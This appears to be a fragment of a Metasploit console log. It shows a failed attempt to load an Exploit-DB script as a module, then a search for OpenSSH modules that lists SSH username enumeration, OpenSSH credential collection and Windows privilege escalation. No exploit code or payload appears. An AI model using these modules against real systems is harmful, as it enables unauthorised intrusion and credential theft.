895[-] Unknown command: linux/remote/45001.py.
896msf5 > use linux/remote/45001.py
897[-] No results from search
898[-] Failed to load module: linux/remote/45001
899msf5 > search OpenSSH
900
901Matching Modules
902================
903
904 # Name Disclosure Date Rank Check Description
905 - ---- --------------- ---- ----- -----------
906 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
907 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
908 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
909 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
910 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
911
912
913msf5 >